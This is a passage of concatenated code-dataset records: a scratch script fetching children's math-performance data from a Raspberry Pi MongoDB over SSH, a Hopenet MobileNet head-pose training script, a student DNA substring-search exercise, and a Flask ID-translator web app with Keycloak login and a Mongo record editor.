problem_lst = list(alphabet[start_ind: end_ind + 1]) + list(range(1, mixed_probs + 1))\n origin_lst = (end_ind - start_ind + 1) * [np.nan] + origin_probs\n\n elif chapter == end_chapter_ass:\n if end_problem_ass.isdigit():\n start_ind = 0\n end_ind = alphabet.find(lesson_probs)\n problem_lst = list(alphabet[start_ind: end_ind + 1]) + list(range(1, int(end_problem_ass) + 1))\n origin_lst = (end_ind - start_ind + 1) * [np.nan] + origin_probs[: int(end_problem_ass)]\n\n else:\n start_ind = 0\n end_ind = alphabet.find(end_problem_ass)\n problem_lst = list(alphabet[start_ind: end_ind + 1])\n origin_lst = (end_ind - start_ind + 1) * [np.nan]\n\n else:\n start_ind = 0\n end_ind = alphabet.find(lesson_probs)\n problem_lst = list(alphabet[start_ind: end_ind + 1]) + list(range(1, mixed_probs + 1))\n origin_lst = (end_ind - start_ind + 1) * [np.nan] + origin_probs\n\n df_temp['problem'] = problem_lst\n df_temp['origin'] = origin_lst\n df_temp['book'] = book\n df_temp['chapter'] = chapter\n df_temp['correct'] = df_temp.apply(lambda x: 0 if str(x['problem']) in missed_probs else 1, axis=1)\n\n df_grande_ass = df_grande_ass.append(df_temp)\n\n df_grande_ass.reset_index(drop=True, inplace=True)\n\n df_grande_ass['date'] = ''\n df_p_g = df_performance_ass.sort_values('date').iterrows()\n\n row_p = next(df_p_g)[1]\n\n\n # todo: here\n # print(df_performance_ass)\n\n\n\n for ind, row in df_grande_ass.iterrows():\n df_grande_ass.set_value(ind, 'date', row_p['date']) # FutureWarning: set_value is deprecated and will be removed in a future release. Please use .at[] or .iat[] accessors instead\n\n if (row['chapter'] == int(float(row_p['end_chapter']))) and (str(row['problem']) == str(row_p['end_problem'])):\n # if (int(float(row['chapter'])) == int(float(row_p['end_chapter']))) and (str(row['problem']) == str(row_p['end_problem'])):\n try:\n row_p = next(df_p_g)[1]\n except:\n print('boom!')\n\n\n # tests\n df_grande_test = pd.DataFrame()\n for ind, row in df_performance_test.iterrows():\n df_temp = pd.DataFrame()\n df_temp['problem'] = range(1, 21)\n df_temp['book'] = book\n df_temp['chapter'] = row['end_chapter']\n df_temp['date'] = row['date']\n\n if isinstance(row['miss_lst'], str):\n miss_lst = ast.literal_eval(row['miss_lst'])\n else:\n miss_lst = row['miss_lst']\n # if row['miss_lst']:\n if miss_lst:\n # missed_probs = row['miss_lst'][row['end_chapter']]\n missed_probs = miss_lst[row['end_chapter']]\n else:\n missed_probs = []\n\n df_temp['correct'] = df_temp.apply(lambda x: 0 if str(x['problem']) in missed_probs else 1, axis=1)\n\n df_grande_test = df_grande_test.append(df_temp)\n\n return df_grande_ass, df_grande_test\n\n\ndef query_performance(name):\n df_assignment = pd.DataFrame()\n df_test = pd.DataFrame()\n\n # for book in ['Math_5_4', 'Math_6_5', 'Math_7_6', 'Math_8_7', 'Algebra_1_2', 'Algebra_1', 'Algebra_2']:\n if name == 'Calvin':\n book = 'Algebra_1_2'\n else:\n book = 'Math_8_7'\n\n if name:\n\n # perf_temp = pd.DataFrame(list(db_performance[book].find({'kid': name})))\n perf_temp = pi_data_fetch('math_performance', book) #, {'kid': name})\n print(perf_temp); sys.exit()\n\n if not perf_temp.empty:\n def to_dict(x):\n if isinstance(x, str):\n return json.loads(x)\n return x\n perf_temp['miss_lst'] = perf_temp['miss_lst'].apply(to_dict)\n\n # numb_temp = pd.DataFrame(list(db_number[book].find()))\n numb_temp = pi_data_fetch('math_book_info', book, None)\n\n # orig_temp = pd.DataFrame(list(db_origin[book].find()))\n orig_temp = pi_data_fetch('math_exercise_origins', book, None)\n\n if perf_temp.shape[0] > 0:\n df_grande_ass, df_grande_test = the_big_one(\n book,\n numb_temp,\n orig_temp,\n perf_temp\n )\n df_assignment = df_assignment.append(df_grande_ass)\n df_test = df_test.append(df_grande_test)\n return df_assignment.append(df_test)\n\n\ndef pi_data_fetch(dbs, collection):\n ssh_host = os.getenv('raspberry_pi_ip')\n ssh_user = os.getenv('raspberry_pi_username')\n ssh_password = os.getenv('raspberry_pi_password')\n\n with SSHTunnelForwarder(\n ssh_host,\n ssh_username=ssh_user,\n ssh_password=ssh_password,\n remote_bind_address=('127.0.0.1', 27017)\n ) as server:\n with MongoClient(\n host='127.0.0.1',\n port=server.local_bind_port\n ) as client:\n db = pd.DataFrame(list(client[dbs][collection].find()))\n\n\n # for ind, row in enumerate(list(client[dbs][collection].find())):\n # try:\n # row['chapter']\n # except:\n # print({'_id': row['_id']})\n # client[dbs][collection].update({'_id': row['_id']}, {'book': collection, 'origin_list': row['origin_list'], 'chapter': ind + 1, })\n # print('\\n')\n\n\n # import ast\n # for row in list(client[dbs][collection].find()):\n # if type(row['origin_list']) == str:\n # print({'_id': row['_id']})\n # print({'origin_list': ast.literal_eval(row['origin_list'])})\n # client[dbs][collection].update({'_id': row['_id']}, {'book': collection, 'origin_list': ast.literal_eval(row['origin_list']), 'chapter': row['chapter']})\n # print('\\n')\n\n\n # sys.exit()\n return db\n\ndef p_main():\n db = pi_data_fetch('math_exercise_origins', 'Math_5_4')\n # db = pi_data_fetch('math_exercise_origins', 'Algebra_1_2')\n # db = pi_data_fetch('math_exercise_origins', 'Math_7_6')\n # db = pi_data_fetch('math_exercise_origins', 'Algebra_1')\n # db = pi_data_fetch('math_exercise_origins', 'Math_8_7')\n print(db)\n\ndef main():\n for user in ['Calvin', 'Samuel']:\n qp = query_performance(user).reset_index(drop=True)\n qp['chapter'] = qp['chapter'].astype(str)\n # print(qp.info())\n # sys.exit()\n\n qp['name'] = user\n qp['date'] = qp['date'].dt.date.astype(str)\n qp['meta__insert_time'] = str(datetime.datetime.today().strftime('%Y-%m-%d %H:%M'))\n # print(qp.head(100))\n\nif __name__ == '__main__':\n main()\n # p_main()\n# todo: this is cool, but need to fetch the data and use it to figure out what is wrong with aggregator_math_performance.py\n","sub_path":"scratch/ssh_scratch.py","file_name":"ssh_scratch.py","file_ext":"py","file_size_in_byte":11577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"107137425","text":"import sys\nimport os\nimport argparse\nimport time\nimport pickle as pkl\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torchvision import transforms\nimport torchvision\nimport torch.backends.cudnn as cudnn\nimport torch.utils.model_zoo as model_zoo\n\nimport datasets\nimport hopenet\nimport utils\n\n\ndef parse_args():\n \"\"\"Parse input arguments.\"\"\"\n parser = argparse.ArgumentParser(\n description=\"Head pose estimation using the Hopenet network.\"\n )\n parser.add_argument(\n \"--num_epochs\",\n dest=\"num_epochs\",\n help=\"Maximum number of training epochs.\",\n default=5,\n type=int,\n )\n parser.add_argument(\n \"--batch_size\", dest=\"batch_size\", help=\"Batch size.\", default=16, type=int\n )\n parser.add_argument(\n \"--lr\", dest=\"lr\", help=\"Base learning rate.\", default=0.001, type=float\n )\n parser.add_argument(\n \"--dataset\",\n dest=\"dataset\",\n help=\"Dataset type.\",\n default=\"Pose_300W_LP\",\n type=str,\n )\n parser.add_argument(\n \"--val_dataset\",\n dest=\"val_dataset\",\n help=\"Dataset type.\",\n default=\"AFLW2000\",\n type=str,\n )\n parser.add_argument(\n \"--data_dir\",\n dest=\"data_dir\",\n help=\"Directory path for data.\",\n default=\"\",\n type=str,\n )\n parser.add_argument(\n \"--out_dir\",\n dest=\"out_dir\",\n help=\"Directory path for snapshots and loss stats.\",\n default=\"output/snapshots/\",\n type=str,\n )\n parser.add_argument(\n \"--filename_list\",\n dest=\"filename_list\",\n help=\"Path to text file containing relative paths for every example.\",\n default=\"\",\n type=str,\n )\n parser.add_argument(\n \"--val_filename_list\",\n dest=\"val_filename_list\",\n help=\"Path to text file containing relative paths for every example.\",\n default=\"\",\n type=str,\n )\n parser.add_argument(\n \"--output_string\",\n dest=\"output_string\",\n help=\"String appended to output snapshots.\",\n default=\"\",\n type=str,\n )\n parser.add_argument(\n \"--alpha\",\n dest=\"alpha\",\n help=\"Regression loss coefficient.\",\n default=0.001,\n type=float,\n )\n parser.add_argument(\n \"--snapshot\",\n dest=\"snapshot\",\n help=\"Path of model snapshot.\",\n default=\"\",\n type=str,\n )\n parser.add_argument(\n \"--mobilenet_width\",\n dest=\"mobilenet_width\",\n help=\"Width coef of the MobileNet.\",\n default=1.0,\n type=float,\n )\n\n args = parser.parse_args()\n return args\n\n\n# FIXME use these functions for freezing layers\ndef get_ignored_params(model):\n # Generator function that yields ignored params.\n b = [model.conv1, model.bn1, model.fc_finetune]\n for i in range(len(b)):\n for module_name, module in b[i].named_modules():\n if \"bn\" in module_name:\n module.eval()\n for name, param in module.named_parameters():\n yield param\n\n\ndef get_non_ignored_params(model):\n # Generator function that yields params that will be optimized.\n b = [model.layer1, model.layer2, model.layer3, model.layer4]\n for i in range(len(b)):\n for module_name, module in b[i].named_modules():\n if \"bn\" in module_name:\n module.eval()\n for name, param in module.named_parameters():\n yield param\n\n\ndef get_fc_params(model):\n # Generator function that yields fc layer params.\n b = [model.fc_yaw, model.fc_pitch, model.fc_roll]\n for i in range(len(b)):\n for module_name, module in b[i].named_modules():\n for name, param in module.named_parameters():\n yield param\n\n\ndef load_filtered_state_dict(model, snapshot):\n # By user apaszke from discuss.pytorch.org\n model_dict = model.state_dict()\n snapshot = {k: v for k, v in snapshot.items() if k in model_dict}\n model_dict.update(snapshot)\n model.load_state_dict(model_dict)\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n num_epochs = args.num_epochs\n batch_size = args.batch_size\n\n if not os.path.exists(\"output/snapshots\"):\n os.makedirs(\"output/snapshots\")\n\n # MObilenet backbone\n model = hopenet.Hopenet_mobilenet(\n num_bins=66, width_mult=args.mobilenet_width, pretrained=False\n )\n\n if not args.snapshot == \"\":\n print(\"Loading weights from \", args.snapshot)\n saved_state_dict = torch.load(args.snapshot)\n model.load_state_dict(saved_state_dict)\n\n print(\"Loading data.\")\n\n transformations = transforms.Compose(\n [\n transforms.Resize(240),\n transforms.RandomCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ]\n )\n\n val_transformations = transforms.Compose(\n [\n transforms.Resize(224),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ]\n )\n\n if args.dataset == \"Pose_300W_LP\":\n pose_dataset = datasets.Pose_300W_LP(\n args.data_dir, args.filename_list, transformations\n )\n elif args.dataset == \"Pose_300W_LP_random_ds\":\n pose_dataset = datasets.Pose_300W_LP_random_ds(\n args.data_dir, args.filename_list, transformations\n )\n elif args.dataset == \"Synhead\":\n pose_dataset = datasets.Synhead(\n args.data_dir, args.filename_list, transformations\n )\n elif args.dataset == \"AFLW2000\":\n pose_dataset = datasets.AFLW2000(\n args.data_dir, args.filename_list, transformations\n )\n elif args.dataset == \"BIWI\":\n pose_dataset = datasets.BIWI(args.data_dir, args.filename_list, transformations)\n elif args.dataset == \"AFLW\":\n pose_dataset = datasets.AFLW(args.data_dir, args.filename_list, transformations)\n elif args.dataset == \"AFLW_aug\":\n pose_dataset = datasets.AFLW_aug(\n args.data_dir, args.filename_list, transformations\n )\n elif args.dataset == \"AFW\":\n pose_dataset = datasets.AFW(args.data_dir, args.filename_list, transformations)\n else:\n print(\"Error: not a valid dataset name\")\n sys.exit()\n\n train_loader = torch.utils.data.DataLoader(\n dataset=pose_dataset, batch_size=batch_size, shuffle=True, num_workers=2\n )\n\n # FIXME\n assert args.val_dataset == \"AFLW2000\"\n val_dataset = datasets.AFLW2000(\n args.data_dir, args.val_filename_list, val_transformations\n )\n\n val_loader = torch.utils.data.DataLoader(\n dataset=val_dataset, batch_size=batch_size // 2, shuffle=False, num_workers=2\n )\n\n model = model.to(device)\n criterion = nn.CrossEntropyLoss().to(device)\n reg_criterion = nn.MSELoss().to(device)\n # Regression loss coefficient\n alpha = args.alpha\n\n softmax = nn.Softmax(dim=1).to(device)\n idx_tensor = [idx for idx in range(66)]\n # idx_tensor = Variable(torch.FloatTensor(idx_tensor))\n idx_tensor = torch.FloatTensor(idx_tensor).to(device)\n\n if args.mobilenet_width != 1.0:\n # training from scratch, so use equal lr for all params\n optimizer = torch.optim.Adam(\n [\n # {\"params\": get_ignored_params(model), \"lr\": 0},\n {\"params\": model.backbone.parameters(), \"lr\": args.lr * 5},\n {\"params\": get_fc_params(model), \"lr\": args.lr * 5},\n ],\n lr=args.lr,\n )\n else:\n optimizer = torch.optim.Adam(\n [\n # {\"params\": get_ignored_params(model), \"lr\": 0},\n {\"params\": model.backbone.parameters(), \"lr\": args.lr},\n {\"params\": get_fc_params(model), \"lr\": args.lr * 5},\n ],\n lr=args.lr,\n )\n\n print(\"Ready to train network.\")\n training_stats = {\n \"loss_yaw\": [],\n \"loss_pitch\": [],\n \"loss_roll\": [],\n \"val_yaw_error\": [],\n \"val_pitch_error\": [],\n \"val_roll_error\": [],\n }\n for epoch in range(num_epochs):\n start = time.time()\n for i, (images, labels, cont_labels, name) in enumerate(train_loader):\n images = images.to(device)\n\n # Binned labels\n label_yaw = labels[:, 0].to(device)\n label_pitch = labels[:, 1].to(device)\n label_roll = labels[:, 2].to(device)\n\n # Continuous labels\n label_yaw_cont = cont_labels[:, 0].to(device)\n label_pitch_cont = cont_labels[:, 1].to(device)\n label_roll_cont = cont_labels[:, 2].to(device)\n\n # Forward pass\n yaw, pitch, roll = model(images)\n\n # Cross entropy loss\n loss_yaw = criterion(yaw, label_yaw)\n loss_pitch = criterion(pitch, label_pitch)\n loss_roll = criterion(roll, label_roll)\n\n # MSE loss\n yaw_predicted = softmax(yaw)\n pitch_predicted = softmax(pitch)\n roll_predicted = softmax(roll)\n\n yaw_predicted = torch.sum(yaw_predicted * idx_tensor, 1) * 3 - 99\n pitch_predicted = torch.sum(pitch_predicted * idx_tensor, 1) * 3 - 99\n roll_predicted = torch.sum(roll_predicted * idx_tensor, 1) * 3 - 99\n\n loss_reg_yaw = reg_criterion(yaw_predicted, label_yaw_cont)\n loss_reg_pitch = reg_criterion(pitch_predicted, label_pitch_cont)\n loss_reg_roll = reg_criterion(roll_predicted, label_roll_cont)\n\n # Total loss\n loss_yaw += alpha * loss_reg_yaw\n loss_pitch += alpha * loss_reg_pitch\n loss_roll += alpha * loss_reg_roll\n\n training_stats[\"loss_yaw\"].append(loss_yaw)\n training_stats[\"loss_pitch\"].append(loss_pitch)\n training_stats[\"loss_roll\"].append(loss_roll)\n\n loss_seq = [loss_yaw, loss_pitch, loss_roll]\n grad_seq = [torch.ones(1).to(device) for _ in range(len(loss_seq))]\n optimizer.zero_grad()\n torch.autograd.backward(loss_seq, grad_seq)\n optimizer.step()\n\n if (i + 1) % 100 == 0:\n print(\n \"Epoch [{}/{}], Iter [{}/{}] Losses: Yaw {:.4f}, Pitch {:.4f}, Roll {:.4f}\".format(\n epoch + 1,\n num_epochs,\n i + 1,\n len(pose_dataset) // batch_size,\n loss_yaw.item(),\n loss_pitch.item(),\n loss_roll.item(),\n )\n )\n\n elapsed_time = time.time() - start\n\n # Save models at numbered epochs.\n if epoch % 1 == 0 and epoch < num_epochs:\n print(\n \"Epoch completed in {:.1f} seconds. Taking snapshot...\".format(\n elapsed_time\n )\n )\n torch.save(\n model.state_dict(),\n os.path.join(\n args.out_dir,\n args.output_string + \"_epoch_\" + str(epoch + 1) + \".pkl\",\n ),\n )\n\n # VALIDATE on \"AFLW2000\"\n model.eval()\n total = 0\n\n idx_tensor = [idx for idx in range(66)]\n idx_tensor = torch.FloatTensor(idx_tensor).to(device)\n\n yaw_error = 0.0\n pitch_error = 0.0\n roll_error = 0.0\n\n for i, (images, labels, cont_labels, name) in enumerate(val_loader):\n images = images.to(device)\n total += cont_labels.size(0)\n\n label_yaw = cont_labels[:, 0].float()\n label_pitch = cont_labels[:, 1].float()\n label_roll = cont_labels[:, 2].float()\n\n yaw, pitch, roll = model(images)\n\n # Binned predictions\n _, yaw_bpred = torch.max(yaw.data, 1)\n _, pitch_bpred = torch.max(pitch.data, 1)\n _, roll_bpred = torch.max(roll.data, 1)\n\n # Continuous predictions\n yaw_predicted = utils.softmax_temperature(yaw.data, 1)\n pitch_predicted = utils.softmax_temperature(pitch.data, 1)\n roll_predicted = utils.softmax_temperature(roll.data, 1)\n\n yaw_predicted = torch.sum(yaw_predicted * idx_tensor, 1).cpu() * 3 - 99\n pitch_predicted = (\n torch.sum(pitch_predicted * idx_tensor, 1).cpu() * 3 - 99\n )\n roll_predicted = (\n torch.sum(roll_predicted * idx_tensor, 1).cpu() * 3 - 99\n )\n\n # Mean absolute error\n yaw_error += torch.sum(torch.abs(yaw_predicted - label_yaw))\n pitch_error += torch.sum(torch.abs(pitch_predicted - label_pitch))\n roll_error += torch.sum(torch.abs(roll_predicted - label_roll))\n\n yaw_error = yaw_error / total\n pitch_error = pitch_error / total\n roll_error = roll_error / total\n training_stats[\"val_yaw_error\"].append(yaw_error)\n training_stats[\"val_pitch_error\"].append(pitch_error)\n training_stats[\"val_roll_error\"].append(roll_error)\n print(\n \"Validation error in degrees of the model on the \"\n + str(total)\n + \" test images. Yaw: %.4f, Pitch: %.4f, Roll: %.4f\"\n % (yaw_error, pitch_error, roll_error)\n )\n model.train() # back to training mode\n\n with open(\n os.path.join(args.out_dir, \"losses\" + args.output_string + \".pkl\"), \"wb\"\n ) as handle:\n pkl.dump(training_stats, handle)\n","sub_path":"code/train_hopenet_mobilenet.py","file_name":"train_hopenet_mobilenet.py","file_ext":"py","file_size_in_byte":13970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"415517432","text":"#!/usr/bin/env python\n\n\"\"\" Assignment 2, Exercise 2, INF1340, Fall, 2015. DNA Sequencing\n\nThis module converts performs substring matching for DNA sequencing\n\n\"\"\"\n\n__author__ = 'Susan Sim'\n__email__ = \"ses@drsusansim.org\"\n__copyright__ = \"2015 Susan Sim\"\n__license__ = \"MIT License\"\n\n\ndef find(input_string, substring, start, end):\n\n \"\"\"\n :param: string, substring, start integer, end integer\n :return: start index of string as integer\n :raises: -1\n \"\"\"\n while start < end:\n if input_string[start:start + len(substring)] == substring:\n return start\n else:\n start += 1\n return -1\n\n\ndef multi_find(input_string, substring, start, end):\n\n \"\"\"\n :param: string, substring, start integer, end integer\n :return: variable result\n :raises: -1\n \"\"\"\n result = \"\"\n\n while start < end:\n if input_string[start:start + len(substring)] == substring:\n result = result + str(start) + \",\"\n start += 1\n else:\n start += 1\n\n result = result[0:len(result) - 1]\n return -1\n","sub_path":"exercise2.py","file_name":"exercise2.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"322255518","text":"\"\"\"\nMethods to handle incoming requests - GSC version, uses gsc_handler\n\n\"\"\"\n\nimport json\nimport sys\nfrom flask import current_app, Blueprint, redirect, request, \\\n url_for, render_template, Response, jsonify\n\nfrom flask_login import login_user, login_required\nfrom flask_bootstrap import __version__ as FLASK_BOOTSTRAP_VERSION\nfrom flask_nav.elements import Navbar, View, Subgroup, Link, Text\nfrom keycloak import exceptions\nfrom pymongo.errors import ConnectionFailure, ServerSelectionTimeoutError, InvalidName\n\nfrom id_translator.api.nav import nav, Alert\nfrom id_translator.api.logging import apilog\nfrom id_translator.forms.forms import AdminLoginForm, AdminToolsForm, \\\n HomeForm, TranslateForm, EditorForm, UploadForm\nfrom id_translator.auth.id_user import User\nfrom id_translator.api.tables import EditTable, Item\n\n\noperations = Blueprint('operations', 'operations', url_prefix='/')\n\nAPP = current_app\n\nnav.register_element('frontend_top', Navbar(\n View('ID Translator', '.get_home'),\n Subgroup(\n 'Docs',\n Link('CanDIG', 'https://candig.bcgsc.ca/'),\n ),\n Text('Using Flask-Bootstrap {}'.format(FLASK_BOOTSTRAP_VERSION)),\n Alert(alerts=\"alerts\", ids=\"nav-alert\"),\n ))\n\n\n\n@apilog\n@operations.route('/', methods=['GET', 'POST'])\n@operations.route('/home', methods=['GET', 'POST'])\ndef get_home():\n \"\"\"\n Landing Page\n\n \"\"\"\n form = HomeForm()\n\n if form.validate_on_submit():\n if form.translate.data:\n return redirect(url_for('operations.translate'))\n if form.admin.data:\n return redirect(url_for('operations.admin_login'))\n return render_template('b_home.html', form=form)\n\n\n@apilog\n@operations.route('/admin_login', methods=['GET', 'POST'])\ndef admin_login():\n \"\"\"\n Login Page to access Editor and Upload tools\n \"\"\"\n form = AdminLoginForm()\n\n if form.back.data:\n return redirect(url_for('operations.get_home'))\n if form.validate_on_submit():\n try:\n token = APP.config[\"KeycloakHandler\"].conn.token(form.username.data, form.password.data)\n except exceptions.KeycloakAuthenticationError:\n print(\"Invalid login\")\n return render_template('b_login.html', form=form)\n else:\n user_info = APP.config[\"KeycloakHandler\"].conn.userinfo(token['access_token'])\n user = User(form.username.data)\n if \"id_edit\" in user_info[\"Access_Permissions\"]:\n login_user(user)\n return redirect(url_for('operations.admin_tools'))\n\n return render_template('b_login.html', form=form)\n\n\n@apilog\n@operations.route('/admin_tools', methods=['GET', 'POST'])\n@login_required\ndef admin_tools():\n \"\"\"\n Navigation page to access Editor and Upload tools\n \"\"\"\n form = AdminToolsForm()\n if form.back.data:\n return redirect(url_for('operations.get_home'))\n if form.edit.data:\n return redirect(url_for('operations.editor'))\n if form.upload.data:\n return redirect(url_for('operations.upload'))\n return render_template('b_admin_tools.html', form=form)\n\n\n@apilog\n@operations.route('/editor', methods=['GET', 'POST'])\n@login_required\ndef editor():\n \"\"\"\n In browser GUI manipulator for Mongo records. Most buttons rely heavily\n on ../static/js/editor.js functions and supporting _helper functions\n defined below.\n\n Produces an editable table of a record searched up using the primary key\n defined in the configuration file. This table uses the X-editable library\n to allow each cell to be edited.\n\n Changes to the table are tracked as a copy of the record stored within the\n MongoHandler class until submission.\n\n \"\"\"\n eform = EditorForm()\n uform = UploadForm()\n pkey = APP.config['project']['PRIMARY_KEY']\n\n table = None\n #APP.config[\"MongoHandler\"].clear_local_temp_records()\n\n if eform.back.data:\n return redirect(url_for('operations.admin_tools'))\n if eform.editor_query.data and eform.validate_on_submit():\n record = APP.config[\"MongoHandler\"].get_record(eform.editor_query.data)\n if record:\n APP.config[\"MongoHandler\"].set_editing_record(record)\n APP.config[\"MongoHandler\"].set_delete_record()\n items = [Item(k, v) for k, v in record.items()]\n table = EditTable(items, table_id=\"Editor\")\n else:\n return Response(\"{} is not a primary key of this collection\".\n format(eform.editor_query.data),\n mimetype=\"text/html\",\n status=404)\n\n return render_template('b_editor.html',\n eform=eform,\n uform=uform,\n table=table,\n pkey=pkey)\n\n\n@apilog\n@operations.route('/keycheck', methods=['GET', 'POST'])\ndef key_check():\n \"\"\"\n Route accessed via AJAX calls to determine whether a\n search term is a valid primary key. Used by editor.js\n\n \"\"\"\n search_id = request.form['search']\n\n if APP.config[\"MongoHandler\"].get_record(search_id):\n return Response(status=200)\n\n return Response(status=404)\n\n\n@apilog\n@operations.route('/editor_helper', methods=['GET', 'POST'])\ndef editor_helper():\n \"\"\"\n Helper function to allow proper editing and addition of new\n key-pairs/rows to the db document/table. When a new row is\n created, the value is only able to be added once the key has\n been assigned a value. This logic is handled in the editor.js\n and this function expects that input flow.\n\n New rows have incremented DOM ids following a '++Project_X, ++ID_X'\n scheme, where X is the nth newest row, tracked by editor.js\n\n \"\"\"\n if APP.config[\"MongoHandler\"].check_editing_record():\n record = APP.config[\"MongoHandler\"].get_editing_record()\n form_dict = request.form\n edited = form_dict['value'].strip()\n edited = edited.replace(\" \", \"_\")\n new_record = form_dict['name'].split(\"_\")[0]\n\n if new_record == \"++Project\":\n \"\"\"\n A new entry needs to be added into the existing record. Use the sibling to grab\n the corresponding value\n \"\"\"\n record[edited] = form_dict['sibling']\n\n elif new_record == \"++ID\":\n \"\"\"\n A new ID has been added. The javascript on the Editor page prevents this from being\n editable until the Project field has been filled out, so the only possibility is that\n a keypair using the new Project (sibling) is in the record.\n \"\"\"\n try:\n record[form_dict['sibling']] = edited\n except KeyError:\n \"\"\"\n This really should not happen.\n \"\"\"\n raise KeyError\n else:\n try:\n value = record[form_dict['name']]\n \"\"\"\n If the code reaches this point it means that the value being edited is the\n project name, not ID, so the previous record needs to be deleted and remade.\n \"\"\"\n record.pop(form_dict['name'])\n record[edited] = value\n except KeyError:\n \"\"\"\n If a KeyError happens at this point, it means the value of a key,value pair in the\n mongo record has been edited, so use the sibling to access the pair and update it.\n \"\"\"\n try:\n val = record[form_dict['sibling']]\n record[form_dict['sibling']] = edited\n\n except KeyError:\n \"\"\"\n This second KeyError shouldn't ever trigger unless something is going \n really wrong with the backend records.\n \"\"\"\n APP.logger.warn(KeyError)\n raise KeyError\n\n APP.config[\"MongoHandler\"].set_editing_record(record)\n return Response(edited, status=200)\n return Response(status=400)\n\n\n@apilog\n@operations.route('/editor_upload', methods=['GET', 'POST'])\ndef editor_upload():\n \"\"\"\n Any changes made to a table in the Editor page will only be applied\n to the actual MongoDB record once this function is called via AJAX.\n\n This function is tied to the 'Upload Changes' button in the page.\n \"\"\"\n if APP.config[\"MongoHandler\"].check_editing_record():\n primary = request.form[APP.config[\"project\"][\"PRIMARY_KEY\"]]\n APP.config[\"MongoHandler\"].set_record(primary)\n return Response(status=200)\n\n return Response(status=404)\n\n@apilog\n@operations.route('/editor_delete', methods=['GET', 'POST'])\ndef editor_delete():\n \"\"\"\n Any deletions made to the table are tracked by a dictionary in the MongoHandler.\n These deletions will be applied once the editor_upload() function is called.\n \"\"\"\n form_dict = request.form\n try:\n APP.config[\"MongoHandler\"].add_to_delete(form_dict['project'], form_dict['id'])\n\n except KeyError:\n return Response(\"Invalid delete keys\", status=404)\n\n return Response(\"Project: {} with ID: {} queued for deletion!\".\n format(form_dict['project'], form_dict['id']), status=200)\n\n\n@apilog\n@operations.route('/translate', methods=['GET', 'POST'])\ndef translate():\n \"\"\"\n Route to display browser page for Translate. Buttons and form depend\n on ../static/js/translate.js.\n\n Any ID specified within 'IDS_TO_RETURN' are valid search IDs\n \"\"\"\n form = TranslateForm()\n ids = APP.config['project']['IDS_TO_RETURN']\n translated = None\n\n if form.back.data:\n return redirect(url_for('operations.get_home'))\n\n if form.validate_on_submit():\n translated = APP.config[\"MongoHandler\"].translate(form.query.data)\n\n return render_template('b_translate.html', form=form, ids=ids, translated=translated)\n\n\n@operations.route('/translate/<_id>', methods=['GET'])\ndef api_translate(_id):\n \"\"\"\n API endpoint of Translate function. Returns all translatable\n IDs of id_\n\n :param _id: string\n :return:\n \"\"\"\n\n translated = APP.config[\"MongoHandler\"].translate(_id)\n if translated:\n return jsonify(translated)\n\n return Response(\"ID not associated with any projects\", mimetype=\"text/html\", status=404)\n\n\n@operations.route('/translate_helper', methods=['GET', 'POST'])\ndef translate_helper():\n \"\"\"\n Helper function to be called via AJAX tied to 'Translate' button on page.\n Returns a table of the translated values rather than just the JSON output\n\n \"\"\"\n\n term = request.form['query']\n\n translated = APP.config[\"MongoHandler\"].translate(term)\n\n if translated:\n table = APP.config[\"MongoHandler\"].make_translated_table(translated)\n\n if table:\n return Response(str(table.__html__()), status=200)\n\n return Response(\"{} is not a valid search key.\".format(term), status=404)\n\n\n@apilog\n@operations.route('/upload', methods=['GET', 'POST'])\n@login_required\ndef upload():\n \"\"\"\n Route to upload page. Buttons and form utilize ../static/js/uploader_gsc.js\n to perform their roles, notably the 'Missed Records' button is an AJAX\n call to get_missed_table() below\n\n \"\"\"\n form = UploadForm()\n whole_form = request.form\n\n table = None\n\n if form.back.data:\n return redirect(url_for('operations.admin_tools'))\n\n \"\"\"\n Normally the upload_confirm button is a boolean field but\n for this page, the uploader_gsc.js is replacing the boolean \n with the name of the file selected. However, as far as the\n python code cares, it's still a boolean so accessing the data\n from the .data field doesn't work.\n \"\"\"\n if form.upload_confirm.data:\n\n try:\n filename = whole_form['upload_confirm']\n file_path = '{}/data/{}'.format(sys.path[0], filename)\n APP.config[\"MongoHandler\"].update_temp_collection(file_path)\n missed, new = APP.config[\"MongoHandler\"].update_main_collection()\n\n if missed:\n missed_msg = \"{} records were unable to be uploaded due to missing \"\\\n \"{} links. Contact BioApps for details. Missed records \"\\\n \"are viewable below.\".format(missed, APP.config['project']['PRIMARY_KEY'])\n\n updated_msg = \"{} records were added to or updated in the database.\".format(new)\n\n payload = json.dumps({\"missed\": missed_msg, \"updated\": updated_msg})\n\n return Response(response=payload, status=206, mimetype='application/json')\n return Response(status=200)\n\n except ConnectionFailure:\n return Response(\"Cannot Establish Connection to Database\", status=500)\n except FileNotFoundError:\n return Response(\"File Not Found\", status=404)\n\n return render_template('/b_upload_gsc.html', form=form, table=table)\n\n\n@operations.route('/get_missed_table')\ndef get_missed_table():\n \"\"\"\n Accessed via AJAX to display any missed entries not linked via\n a BioApps file\n\n \"\"\"\n table = APP.config[\"MongoHandler\"].get_missed_table()\n\n return Response(str(table.__html__()), status=200)\n\n@apilog\n@operations.route('/get_uploads')\ndef get_uploads():\n \"\"\"\n Route called via AJAX to populate the dropdown menu in\n the Upload page\n \"\"\"\n\n files = APP.config[\"MongoHandler\"].get_upload_files()\n return jsonify(files)\n\n\n@operations.route('/get_panel_info')\ndef get_panel_info():\n \"\"\"\n Route called via AJAX to get data to populate the info\n panel next to the jumbotron in Translate, Editor and Upload\n \"\"\"\n main_db = APP.config[\"MongoHandler\"].get_main_db_count()\n primary = APP.config[\"project\"][\"PRIMARY_KEY\"]\n projects = APP.config[\"project\"][\"IDS_TO_RETURN\"]\n\n return jsonify({\n \"Searchable Records\": main_db,\n \"Editor Search Key\": primary,\n \"Valid Translation IDs\": projects\n 